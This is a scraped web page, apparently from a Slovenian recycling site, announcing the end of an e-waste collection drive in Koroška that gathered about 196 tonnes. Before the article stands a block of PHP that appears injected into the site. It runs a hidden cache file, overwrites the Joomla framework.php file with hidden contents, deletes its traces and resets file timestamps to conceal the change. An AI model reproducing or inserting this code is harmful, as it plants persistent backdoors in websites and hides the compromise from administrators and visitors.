$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Akcija zbiranja OEEO na Koroškem zaključena

Akcija zbiranja OEEO na Koroškem zaključena

Akcija zbiranja OEEO na Koroškem zaključena

ZBRALI SMO OKROG 196 TON ODPADNE OEEO OPREME

Spoštovani učenci, učitelji, starši in vsi, ki ste sodelovali v naši akciji,
končali smo! Našo veliko akcijo zbiranja odpadne električne in elektronske opreme na Koroškem. Bili ste preprosto enkratni. Takšne količine, v takšnem času je enkraten rezultat! Skupaj smo zbrali neverjetnih 196 ton odpadne OEEO.

Več: http://surovina.si/velika_osvescevalno_zbiralna_nagradna_akcija/